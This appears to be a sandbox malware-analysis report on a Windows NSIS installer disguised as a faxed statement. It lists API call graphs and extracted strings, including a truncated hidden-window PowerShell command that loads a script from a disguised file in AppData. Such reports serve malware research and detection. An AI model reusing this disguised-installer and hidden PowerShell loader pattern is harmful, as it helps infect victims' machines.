4564->4565 4566 401c16 GlobalAlloc 4564->4566 4576 40239d 4565->4576 4583 406668 lstrcpynW 4565->4583 4567 4066a5 17 API calls 4566->4567 4567->4569 4568 4066a5 17 API calls 4570 402397 4568->4570 4569->4568 4569->4576 4577 405cc8 MessageBoxIndirectW 4570->4577 4581 406668 lstrcpynW 4571->4581 4574 401c03 GlobalFree 4574->4576 4575 401bce 4582 406668 lstrcpynW 4575->4582 4577->4576 4579 401bdd 4584 406668 lstrcpynW 4579->4584 4581->4575 4582->4579 4583->4574 4584->4576 4585 40261c 4586 402da6 17 API calls 4585->4586 4587 402623 4586->4587 4590 406158 GetFileAttributesW CreateFileW 4587->4590 4589 40262f 4590->4589 4598 40149e 4599 4014ac PostQuitMessage 4598->4599 4600 40239d 4598->4600 4599->4600 4601 40259e 4602 402de6 17 API calls 4601->4602 4603 4025a8 4602->4603 4604 402d84 17 API calls 4603->4604 4605 4025b1 4604->4605 4606 4025d9 RegEnumValueW 4605->4606 4607 4025cd RegEnumKeyW 4605->4607 4609 40292e 4605->4609 4608 4025ee RegCloseKey 4606->4608 4607->4608 4608->4609 3790 4015a3 3791 402da6 17 API calls 3790->3791 3792 4015aa SetFileAttributesW 3791->3792 3793 4015bc 3792->3793 3794 401fa4 3795 402da6 17 API calls 3794->3795 3796 401faa 3795->3796 3797 4056ca 24 API calls 3796->3797 3798 401fb4 3797->3798 3799 405c4b 2 API calls 3798->3799 3800 401fba 3799->3800 3801 401fdd CloseHandle 3800->3801 3805 40292e 3800->3805 3809 406ae0 WaitForSingleObject 3800->3809 3801->3805 3804 401fcf 3806 401fd4 3804->3806 3807 401fdf 3804->3807 3814 4065af wsprintfW 3806->3814 3807->3801 3810 406afa 3809->3810 3811 406b0c GetExitCodeProcess 3810->3811 3812 406a71 2 API calls 3810->3812 3811->3804 3813 406b01 WaitForSingleObject 3812->3813 3813->3810 3814->3801 3960 40252a 3971 402de6 3960->3971 3963 402da6 17 API calls 3964 40253d 3963->3964 3965 402548 RegQueryValueExW 3964->3965 3970 40292e 3964->3970 3966 40256e RegCloseKey 3965->3966 3967 402568 3965->3967 3966->3970 3967->3966 3976 4065af wsprintfW 3967->3976 3972 402da6 17 API calls 3971->3972 3973 402dfd 3972->3973 3974 4064d5 RegOpenKeyExW 3973->3974 3975 402534 3974->3975 3975->3963 3976->3966 4611 40202a 4612 402da6 17 API calls 4611->4612 4613 402031 4612->4613 4614 406a35 5 API calls 4613->4614 4615 402040 4614->4615 4616 4020cc 4615->4616 4617 40205c GlobalAlloc 4615->4617 4617->4616 4618 402070 4617->4618 4619 406a35 5 API calls 4618->4619 4620 402077 4619->4620 4621 406a35 5 API calls 4620->4621 4622 402081 4621->4622 4622->4616 4626 4065af wsprintfW 4622->4626 4624 4020ba 4627 4065af wsprintfW 4624->4627 4626->4624 4627->4616 4628 4021aa 4629 402da6 17 API calls 4628->4629 4630 4021b1 4629->4630 4631 402da6 17 API calls 4630->4631 4632 4021bb 4631->4632 4633 402da6 17 API calls 4632->4633 4634 4021c5 4633->4634 4635 402da6 17 API calls 4634->4635 4636 4021cf 4635->4636 4637 402da6 17 API calls 4636->4637 4638 4021d9 4637->4638 4639 402218 CoCreateInstance 4638->4639 4640 402da6 17 API calls 4638->4640 4643 402237 4639->4643 4640->4639 4641 401423 24 API calls 4642 4022f6 4641->4642 4643->4641 4643->4642 4651 401a30 4652 402da6 17 API calls 4651->4652 4653 401a39 ExpandEnvironmentStringsW 4652->4653 4654 401a4d 4653->4654 4656 401a60 4653->4656 4655 401a52 lstrcmpW 4654->4655 4654->4656 4655->4656 4657 405031 GetDlgItem GetDlgItem 4658 405083 7 API calls 4657->4658 4659 4052a8 4657->4659 4660 40512a DeleteObject 4658->4660 4661 40511d SendMessageW 4658->4661 4664 40538a 4659->4664 4691 405317 4659->4691 4711 404f7f SendMessageW 4659->4711 4662 405133 4660->4662 4661->4660 4663 40516a 4662->4663 4665 4066a5 17 API calls 4662->4665 4666 4045c4 18 API calls 4663->4666 4667 405436 4664->4667 4672 40529b 4664->4672 4677 4053e3 SendMessageW 4664->4677 4670 40514c SendMessageW SendMessageW 4665->4670 4671 40517e 4666->4671 4668 405440 SendMessageW 4667->4668 4669 405448 4667->4669 4668->4669 4679 405461 4669->4679 4680 40545a ImageList_Destroy 4669->4680 4688 405471 4669->4688 4670->4662 4676 4045c4 18 API calls 4671->4676 4674 40462b 8 API calls 4672->4674 4673 40537c SendMessageW 4673->4664 4678 405637 4674->4678 4692 40518f 4676->4692 4677->4672 4682 4053f8 SendMessageW 4677->4682 4683 40546a GlobalFree 4679->4683 4679->4688 4680->4679 4681 4055eb 4681->4672 4686 4055fd ShowWindow GetDlgItem ShowWindow 4681->4686 4685 40540b 4682->4685 4683->4688 4684 40526a GetWindowLongW SetWindowLongW 4687 405283 4684->4687 4697 40541c SendMessageW 4685->4697 4686->4672 4689 4052a0 4687->4689 4690 405288 ShowWindow 4687->4690 4688->4681 4704 4054ac 4688->4704 4716 404fff 4688->4716 4710 4045f9 SendMessageW 4689->4710 4709 4045f9 SendMessageW 4690->4709 4691->4664 4691->4673 4692->4684 4693 405265 4692->4693 4696 4051e2 SendMessageW 4692->4696 4698 405220 SendMessageW 4692->4698 4699 405234 SendMessageW 4692->4699 4693->4684 4693->4687 4696->4692 4697->4667 4698->4692 4699->4692 4701 4055b6 4702 4055c1 InvalidateRect 4701->4702 4705 4055cd 4701->4705 4702->4705 4703 4054da SendMessageW 4707 4054f0 4703->4707 4704->4703 4704->4707 4705->4681 4725 404f3a 4705->4725 4706 405564 SendMessageW SendMessageW 4706->4707 4707->4701 4707->4706 4709->4672 4710->4659 4712 404fa2 GetMessagePos ScreenToClient SendMessageW 4711->4712 4713 404fde SendMessageW 4711->4713 4714 404fd6 4712->4714 4715 404fdb 4712->4715 4713->4714 4714->4691 4715->4713 4728 406668 lstrcpynW 4716->4728 4718 405012 4729 4065af wsprintfW 4718->4729 4720 40501c 4721 40140b 2 API calls 4720->4721 4722 405025 4721->4722 4730 406668 lstrcpynW 4722->4730 4724 40502c 4724->4704 4731 404e71 4725->4731 4727 404f4f 4727->4681 4728->4718 4729->4720 4730->4724 4732 404e8a 4731->4732 4733 4066a5 17 API calls 4732->4733 4734 404eee 4733->4734 4735 4066a5 17 API calls 4734->4735 4736 404ef9 4735->4736 4737 4066a5 17 API calls 4736->4737 4738 404f0f lstrlenW wsprintfW SetDlgItemTextW 4737->4738 4738->4727 4018 4023b2 4019 4023ba 4018->4019 4022 4023c0 4018->4022 4020 402da6 17 API calls 4019->4020 4020->4022 4021 4023ce 4023 4023dc 4021->4023 4025 402da6 17 API calls 4021->4025 4022->4021 4024 402da6 17 API calls 4022->4024 4026 402da6 17 API calls 4023->4026 4024->4021 4025->4023 4027 4023e5 WritePrivateProfileStringW 4026->4027 4033 402434 4034 402467 4033->4034 4035 40243c 4033->4035 4037 402da6 17 API calls 4034->4037 4036 402de6 17 API calls 4035->4036 4038 402443 4036->4038 4039 40246e 4037->4039 4040 40244d 4038->4040 4043 40247b 4038->4043 4045 402e64 4039->4045 4042 402da6 17 API calls 4040->4042 4044 402454 RegDeleteValueW RegCloseKey 4042->4044 4044->4043 4046 402e71 4045->4046 4047 402e78 4045->4047 4046->4043 4047->4046 4049 402ea9 4047->4049 4050 4064d5 RegOpenKeyExW 4049->4050 4051 402ed7 4050->4051 4052 402ee7 RegEnumValueW 4051->4052 4059 402f81 4051->4059 4061 402f0a 4051->4061 4053 402f71 RegCloseKey 4052->4053 4052->4061 4053->4059 4054 402f46 RegEnumKeyW 4055 402f4f RegCloseKey 4054->4055 4054->4061 4056 406a35 5 API calls 4055->4056 4057 402f5f 4056->4057 4057->4059 4060 402f63 RegDeleteKeyW 4057->4060 4058 402ea9 6 API calls 4058->4061 4059->4046 4060->4059 4061->4053 4061->4054 4061->4055 4061->4058 4744 404734 lstrlenW 4745 404753 4744->4745 4746 404755 WideCharToMultiByte 4744->4746 4745->4746 4747 401735 4748 402da6 17 API calls 4747->4748 4749 40173c SearchPathW 4748->4749 4750 401757 4749->4750 4751 404ab5 4752 404ae1 4751->4752 4753 404af2 4751->4753 4812 405cac GetDlgItemTextW 4752->4812 4755 404afe GetDlgItem 4753->4755 4761 404b5d 4753->4761 4758 404b12 4755->4758 4756 404c41 4809 404df0 4756->4809 4814 405cac GetDlgItemTextW 4756->4814 4757 404aec 4759 4068ef 5 API calls 4757->4759 4760 404b26 SetWindowTextW 4758->4760 4764 405fe2 4 API calls 4758->4764 4759->4753 4765 4045c4 18 API calls 4760->4765 4761->4756 4766 4066a5 17 API calls 4761->4766 4761->4809 4763 40462b 8 API calls 4768 404e04 4763->4768 4769 404b1c 4764->4769 4770 404b42 4765->4770 4771 404bd1 SHBrowseForFolderW 4766->4771 4767 404c71 4772 40603f 18 API calls 4767->4772 4769->4760 4776 405f37 3 API calls 4769->4776 4773 4045c4 18 API calls 4770->4773 4771->4756 4774 404be9 CoTaskMemFree 4771->4774 4775 404c77 4772->4775 4777 404b50 4773->4777 4778 405f37 3 API calls 4774->4778 4815 406668 lstrcpynW 4775->4815 4776->4760 4813 4045f9 SendMessageW 4777->4813 4780 404bf6 4778->4780 4783 404c2d SetDlgItemTextW 4780->4783 4787 4066a5 17 API calls 4780->4787 4782 404b56 4785 406a35 5 API calls 4782->4785 4783->4756 4784 404c8e 4786 406a35 5 API calls 4784->4786 4785->4761 4793 404c95 4786->4793 4789 404c15 lstrcmpiW 4787->4789 4788 404cd6 4816 406668 lstrcpynW 4788->4816 4789->4783 4790 404c26 lstrcatW 4789->4790 4790->4783 4792 404cdd 4794 405fe2 4 API calls 4792->4794 4793->4788 4798 405f83 2 API calls 4793->4798 4799 404d2e 4793->4799 4795 404ce3 GetDiskFreeSpaceW 4794->4795 4797 404d07 MulDiv 4795->4797 4795->4799 4797->4799 4798->4793 4801 404f3a 20 API calls 4799->4801 4808 404d9f 4799->4808 4800 404dc2 4817 4045e6 KiUserCallbackDispatcher 4800->4817 4803 404d8c 4801->4803 4802 40140b 2 API calls 4802->4800 4805 404da1 SetDlgItemTextW 4803->4805 4806 404d91 4803->4806 4805->4808 4807 404e71 20 API calls 4806->4807 4807->4808 4808->4800 4808->4802 4809->4763 4810 404dde 4810->4809 4811 404a0e SendMessageW 4810->4811 4811->4809 4812->4757 4813->4782 4814->4767 4815->4784 4816->4792 4817->4810 4818 401d38 4819 402d84 17 API calls 4818->4819 4820 401d3f 4819->4820 4821 402d84 17 API calls 4820->4821 4822 401d4b GetDlgItem 4821->4822 4823 402638 4822->4823 4824 4014b8 4825 4014be 4824->4825 4826 401389 2 API calls 4825->4826 4827 4014c6 4826->4827 4828 40563e 4829 405662 4828->4829 4830 40564e 4828->4830 4833 40566a IsWindowVisible 4829->4833 4839 405681 4829->4839 4831 405654 4830->4831 4832 4056ab 4830->4832 4835 404610 SendMessageW 4831->4835 4834 4056b0 CallWindowProcW 4832->4834 4833->4832 4836 405677 4833->4836 4838 40565e 4834->4838 4835->4838 4837 404f7f 5 API calls 4836->4837 4837->4839 4839->4834 4840 404fff 4 API calls 4839->4840 4840->4832 4841 40263e 4842 402652 4841->4842 4843 40266d 4841->4843 4846 402d84 17 API calls 4842->4846 4844 402672 4843->4844 4845 40269d 4843->4845 4847 402da6 17 API calls 4844->4847 4848 402da6 17 API calls 4845->4848 4856 402659 4846->4856 4849 402679 4847->4849 4850 4026a4 lstrlenW 4848->4850 4858 40668a WideCharToMultiByte 4849->4858 4850->4856 4852 40268d lstrlenA 4852->4856 4853 4026e7 4854 4026d1 4854->4853 4855 40620a WriteFile 4854->4855 4855->4853 4856->4853 4856->4854 4857 406239 5 API calls 4856->4857 4857->4854 4858->4852

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 0 403640-403690 SetErrorMode GetVersionExW 1 403692-4036c6 GetVersionExW 0->1 2 4036ca-4036d1 0->2 1->2 3 4036d3 2->3 4 4036db-40371b 2->4 3->4 5 40371d-403725 call 406a35 4->5 6 40372e 4->6 5->6 11 403727 5->11 8 403733-403747 call 4069c5 lstrlenA 6->8 13 403749-403765 call 406a35 * 3 8->13 11->6 20 403776-4037d8 #17 OleInitialize SHGetFileInfoW call 406668 GetCommandLineW call 406668 13->20 21 403767-40376d 13->21 28 4037e1-4037f4 call 405f64 CharNextW 20->28 29 4037da-4037dc 20->29 21->20 25 40376f 21->25 25->20 32 4038eb-4038f1 28->32 29->28 33 4038f7 32->33 34 4037f9-4037ff 32->34 37 40390b-403925 GetTempPathW call 40360f 33->37 35 403801-403806 34->35 36 403808-40380e 34->36 35->35 35->36 38 403810-403814 36->38 39 403815-403819 36->39 47 403927-403945 GetWindowsDirectoryW lstrcatW call 40360f 37->47 48 40397d-403995 DeleteFileW call 4030d0 37->48 38->39 41 4038d9-4038e7 call 405f64 39->41 42 40381f-403825 39->42 41->32 58 4038e9-4038ea 41->58 45 403827-40382e 42->45 46 40383f-403878 42->46 51 403830-403833 45->51 52 403835 45->52 53 403894-4038ce 46->53 54 40387a-40387f 46->54 47->48 62 403947-403977 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40360f 47->62 64 40399b-4039a1 48->64 65 403b6c-403b7a call 403c25 OleUninitialize 48->65 51->46 51->52 52->46 56 4038d0-4038d4 53->56 57 4038d6-4038d8 53->57 54->53 60 403881-403889 54->60 56->57 63 4038f9-403906 call 406668 56->63 57->41 58->32 66 403890 60->66 67 40388b-40388e 60->67 62->48 62->65 63->37 69 4039a7-4039ba call 405f64 64->69 70 403a48-403a4f call 403d17 64->70 79 403b91-403b97 65->79 80 403b7c-403b8b call 405cc8 ExitProcess 65->80 66->53 67->53 67->66 84 403a0c-403a19 69->84 85 4039bc-4039f1 69->85 78 403a54-403a57 70->78 78->65 82 403b99-403bae GetCurrentProcess OpenProcessToken 79->82 83 403c0f-403c17 79->83 89 403bb0-403bd9 LookupPrivilegeValueW AdjustTokenPrivileges 82->89 90 403bdf-403bed call 406a35 82->90 92 403c19 83->92 93 403c1c-403c1f ExitProcess 83->93 86 403a1b-403a29 call 40603f 84->86 87 403a5c-403a70 call 405c33 lstrcatW 84->87 91 4039f3-4039f7 85->91 86->65 103 403a2f-403a45 call 406668 * 2 86->103 106 403a72-403a78 lstrcatW 87->106 107 403a7d-403a97 lstrcatW lstrcmpiW 87->107 89->90 104 403bfb-403c06 ExitWindowsEx 90->104 105 403bef-403bf9 90->105 97 403a00-403a08 91->97 98 4039f9-4039fe 91->98 92->93 97->91 102 403a0a 97->102 98->97 98->102 102->84 103->70 104->83 111 403c08-403c0a call 40140b 104->111 105->104 105->111 106->107 108 403b6a 107->108 109 403a9d-403aa0 107->109 108->65 112 403aa2-403aa7 call 405b99 109->112 113 403aa9 call 405c16 109->113 111->83 121 403aae-403abe SetCurrentDirectoryW 112->121 113->121 123 403ac0-403ac6 call 406668 121->123 124 403acb-403af7 call 406668 121->124 123->124 128 403afc-403b17 call 4066a5 DeleteFileW 124->128 131 403b57-403b61 128->131 132 403b19-403b29 CopyFileW 128->132 131->128 134 403b63-403b65 call 406428 131->134 132->131 133 403b2b-403b4b call 406428 call 4066a5 call 405c4b 132->133 133->131 142 403b4d-403b54 CloseHandle 133->142 134->108 142->131
                                                                                              APIs
                                                                                              • SetErrorMode.KERNELBASE(00008001), ref: 00403663
                                                                                              • GetVersionExW.KERNEL32(?), ref: 0040368C
                                                                                              • GetVersionExW.KERNEL32(0000011C), ref: 004036A3
                                                                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040373A
                                                                                              • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403776
                                                                                              • OleInitialize.OLE32(00000000), ref: 0040377D
                                                                                              • SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 0040379B
                                                                                              • GetCommandLineW.KERNEL32(00429260,NSIS Error), ref: 004037B0
                                                                                              • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exe",00000020,"C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exe",00000000), ref: 004037E9
                                                                                              • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 0040391C
                                                                                              • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040392D
                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403939
                                                                                              • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040394D
                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403955
                                                                                              • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403966
                                                                                              • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040396E
                                                                                              • DeleteFileW.KERNELBASE(1033), ref: 00403982
                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exe",00000000,?), ref: 00403A69
                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exe",00000000,?), ref: 00403A78
                                                                                                • Part of subcall function 00405C16: CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exe",00000000,?), ref: 00403A83
                                                                                              • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exe",00000000,?), ref: 00403A8F
                                                                                              • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403AAF
                                                                                              • DeleteFileW.KERNEL32(00420F08,00420F08,?,powershell.exe -windowstyle hidden "$hjhedens=gc -Raw 'C:\Users\user\AppData\Roaming\floddeltaers\Epopeernes\Thionylamine.asf';$T,?), ref: 00403B0E
                                                                                              • CopyFileW.KERNEL32(C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exe,00420F08,00000001), ref: 00403B21
                                                                                              • CloseHandle.KERNEL32(00000000,00420F08,00420F08,?,00420F08,00000000), ref: 00403B4E
                                                                                              • OleUninitialize.OLE32(?), ref: 00403B71
                                                                                              • ExitProcess.KERNEL32 ref: 00403B8B
                                                                                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403B9F
                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00403BA6
                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BBA
                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403BD9
                                                                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 00403BFE
                                                                                              • ExitProcess.KERNEL32 ref: 00403C1F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                                                              • String ID: "C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\floddeltaers$C:\Users\user\AppData\Roaming\floddeltaers\Epopeernes$C:\Users\user\Desktop$C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$powershell.exe -windowstyle hidden "$hjhedens=gc -Raw 'C:\Users\user\AppData\Roaming\floddeltaers\Epopeernes\Thionylamine.asf';$T$~nsu
                                                                                              • API String ID: 3859024572-2285258221
                                                                                              • Opcode ID: 16a0c47f82b06cd01e9ecb5d6d33c38438045734fdbfd39aa81d588fee1e644c
                                                                                              • Instruction ID: d56582c8b11bee4b9d4e83ad1f604629a9588d533935b381636b20c84fba3529
                                                                                              • Opcode Fuzzy Hash: 16a0c47f82b06cd01e9ecb5d6d33c38438045734fdbfd39aa81d588fee1e644c
                                                                                              • Instruction Fuzzy Hash: D4E1F471A00214AADB20AFB58D45A6E3EB8EB05709F50847FF945B32D1DB7C8A41CB6D

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 143 405809-405824 144 4059b3-4059ba 143->144 145 40582a-4058f1 GetDlgItem * 3 call 4045f9 call 404f52 GetClientRect GetSystemMetrics SendMessageW * 2 143->145 147 4059e4-4059f1 144->147 148 4059bc-4059de GetDlgItem CreateThread CloseHandle 144->148 166 4058f3-40590d SendMessageW * 2 145->166 167 40590f-405912 145->167 150 4059f3-4059f9 147->150 151 405a0f-405a19 147->151 148->147 153 405a34-405a3d call 40462b 150->153 154 4059fb-405a0a ShowWindow * 2 call 4045f9 150->154 155 405a1b-405a21 151->155 156 405a6f-405a73 151->156 163 405a42-405a46 153->163 154->151 160 405a23-405a2f call 40459d 155->160 161 405a49-405a59 ShowWindow 155->161 156->153 158 405a75-405a7b 156->158 158->153 168 405a7d-405a90 SendMessageW 158->168 160->153 164 405a69-405a6a call 40459d 161->164 165 405a5b-405a64 call 4056ca 161->165 164->156 165->164 166->167 172 405922-405939 call 4045c4 167->172 173 405914-405920 SendMessageW 167->173 174 405b92-405b94 168->174 175 405a96-405ac1 CreatePopupMenu call 4066a5 AppendMenuW 168->175 182 40593b-40594f ShowWindow 172->182 183 40596f-405990 GetDlgItem SendMessageW 172->183 173->172 174->163 180 405ac3-405ad3 GetWindowRect 175->180 181 405ad6-405aeb TrackPopupMenu 175->181 180->181 181->174 185 405af1-405b08 181->185 186 405951-40595c ShowWindow 182->186 187 40595e 182->187 183->174 184 405996-4059ae SendMessageW * 2 183->184 184->174 189 405b0d-405b28 SendMessageW 185->189 188 405964-40596a call 4045f9 186->188 187->188 188->183 189->189 190 405b2a-405b4d OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 189->190 192 405b4f-405b76 SendMessageW 190->192 192->192 193 405b78-405b8c GlobalUnlock SetClipboardData CloseClipboard 192->193 193->174
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,00000403), ref: 00405867
                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 00405876
                                                                                              • GetClientRect.USER32(?,?), ref: 004058B3
                                                                                              • GetSystemMetrics.USER32(00000002), ref: 004058BA
                                                                                              • SendMessageW.USER32(?,00001061,00000000,?), ref: 004058DB
                                                                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004058EC
                                                                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004058FF
                                                                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040590D
                                                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405920
                                                                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405942
                                                                                              • ShowWindow.USER32(?,00000008), ref: 00405956
                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 00405977
                                                                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405987
                                                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059A0
                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059AC
                                                                                              • GetDlgItem.USER32(?,000003F8), ref: 00405885
                                                                                                • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004059C9
                                                                                              • CreateThread.KERNELBASE(00000000,00000000,Function_0000579D,00000000), ref: 004059D7
                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 004059DE
                                                                                              • ShowWindow.USER32(00000000), ref: 00405A02
                                                                                              • ShowWindow.USER32(?,00000008), ref: 00405A07
                                                                                              • ShowWindow.USER32(00000008), ref: 00405A51
                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405A85
                                                                                              • CreatePopupMenu.USER32 ref: 00405A96
                                                                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405AAA
                                                                                              • GetWindowRect.USER32(?,?), ref: 00405ACA
                                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405AE3
                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B1B
                                                                                              • OpenClipboard.USER32(00000000), ref: 00405B2B
                                                                                              • EmptyClipboard.USER32 ref: 00405B31
                                                                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B3D
                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00405B47
                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B5B
                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405B7B
                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00405B86
                                                                                              • CloseClipboard.USER32 ref: 00405B8C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
